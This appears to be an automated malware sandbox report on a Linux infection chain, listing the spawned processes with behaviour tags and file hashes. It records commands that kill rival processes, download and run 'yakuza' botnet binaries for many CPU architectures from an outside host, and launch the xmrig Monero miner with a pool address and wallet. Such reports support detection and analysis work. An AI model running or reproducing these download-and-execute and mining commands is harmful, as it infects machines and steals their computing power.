/bin/shsh -c "pkill -9 ofhasfhiafhoi || busybox pkill -9 ofhasfhiafhoi"3⤵
-
/usr/bin/pkillpkill -9 ofhasfhiafhoi4⤵
-
-
/bin/busyboxbusybox pkill -9 ofhasfhiafhoi4⤵
-
-
-
/bin/shsh -c "pkill -9 BzSxLxBxeY || busybox pkill -9 BzSxLxBxeY"3⤵
-
/usr/bin/pkillpkill -9 BzSxLxBxeY4⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 BzSxLxBxeY4⤵
-
-
-
/bin/shsh -c "pkill -9 X19I239124UIU || busybox pkill -9 X19I239124UIU"3⤵
-
/usr/bin/pkillpkill -9 X19I239124UIU4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 X19I239124UIU4⤵
-
-
-
/bin/shsh -c "pkill -9 oism || busybox pkill -9 oism"3⤵
-
/usr/bin/pkillpkill -9 oism4⤵
-
-
/bin/busyboxbusybox pkill -9 oism4⤵
-
-
-
/bin/shsh -c "pkill -9 Deported || busybox pkill -9 Deported"3⤵
-
/usr/bin/pkillpkill -9 Deported4⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 Deported4⤵
-
-
-
/bin/shsh -c "pkill -9 XSHJEHHEIIHWO || busybox pkill -9 XSHJEHHEIIHWO"3⤵
-
/usr/bin/pkillpkill -9 XSHJEHHEIIHWO4⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 XSHJEHHEIIHWO4⤵
-
-
-
/bin/shsh -c "pkill -9 olsVNwo12 || busybox pkill -9 olsVNwo12"3⤵
-
/usr/bin/pkillpkill -9 olsVNwo124⤵
-
-
-
-
/bin/rmrm -rf yakuza.mipsel2⤵
- System Network Configuration Discovery
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.sh2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x yakuza.sh2⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.sh./yakuza.sh2⤵
-
-
/bin/rmrm -rf yakuza.sh2⤵
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.x862⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x yakuza.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.x86./yakuza.x862⤵
-
-
/bin/rmrm -rf yakuza.x862⤵
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.arm62⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x yakuza.arm62⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.arm6./yakuza.arm62⤵
-
-
/bin/rmrm -rf yakuza.arm62⤵
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.i6862⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x yakuza.i6862⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.i686./yakuza.i6862⤵
-
-
/bin/rmrm -rf yakuza.i6862⤵
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.ppc2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x yakuza.ppc2⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.ppc./yakuza.ppc2⤵
-
-
/bin/rmrm -rf yakuza.ppc2⤵
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.i5862⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x yakuza.i5862⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.i586./yakuza.i5862⤵
-
-
/bin/rmrm -rf yakuza.i5862⤵
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.m68k2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x yakuza.m68k2⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.m68k./yakuza.m68k2⤵
-
-
/bin/rmrm -rf yakuza.m68k2⤵
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.arm42⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x yakuza.arm42⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.arm4./yakuza.arm42⤵
-
-
/bin/rmrm -rf yakuza.arm42⤵
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.arm52⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x yakuza.arm52⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.arm5./yakuza.arm52⤵
-
-
/bin/rmrm -rf yakuza.arm52⤵
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.arm72⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x yakuza.arm72⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.arm7./yakuza.arm72⤵
-
-
/bin/rmrm -rf yakuza.arm72⤵
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.sparc2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x yakuza.sparc2⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.sparc./yakuza.sparc2⤵
-
-
/bin/rmrm -rf yakuza.sparc2⤵
-
-
/bin/bashbash2⤵
-
/bin/psps x3⤵
- Reads runtime system information
-
-
/bin/grepgrep xmrig3⤵
-
-
/bin/grepgrep -v grep3⤵
-
-
/bin/grepgrep 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW3⤵
-
-
/usr/bin/curlcurl -O ftp://linux-it.abuser.eu/xmrig-lnx/xmrig3⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x xmrig3⤵
- File and Directory Permissions Modification
-
-
-
/usr/bin/curlcurl -s http://linux-it.abuser.eu/test.php2⤵
-
-
/usr/bin/nohupnohup ./xmrig --url gulf.moneroocean.stream:443 --user 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW --pass worker448 --tls "--cpu-priority=3" "--asm=auto"1⤵
-
/tmp/xmrig./xmrig --url gulf.moneroocean.stream:443 --user 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW --pass worker448 --tls "--cpu-priority=3" "--asm=auto"1⤵
- Executes dropped EXE
-
/bin/sh/bin/sh ./xmrig --url gulf.moneroocean.stream:443 --user 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW --pass worker448 --tls "--cpu-priority=3" "--asm=auto"1⤵
- Writes file to tmp directory
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7.9MB
MD58f4fff0ded94f1141768220906abfbb8
SHA1ea7c97294f415dc8713ac8c280b3123da62f6e56
SHA256b0e1ae6d73d656b203514f498b59cbcf29f067edf6fbd3803a3de7d21960848d
SHA5120096072a1482f8e7999867baa3dd6e96d51591e9f7645c9ff276b53984957025c83e1fe52e5c4f55639eeed2bdbd80bbd57d7dacd84468ce09c834e39dfc4bee
-
Filesize
183KB
MD5371732a722f576ce663cf832412521a8
SHA17d8f25bfc26af545c568ffc5c0afe8c4cd35de40
SHA25611bd15eeca11f8fcb46cce41f4387505027446b5ba8774d2b7bd759bcdb1b9d0
SHA512c2174eeaf058a5d78d2bb7e417373c56d5b407072de68aaae33c690fd14b93a033ef4aeb18f9a364541e51b6cfc0a28c93efbb4a1857a15b875d420e9886c014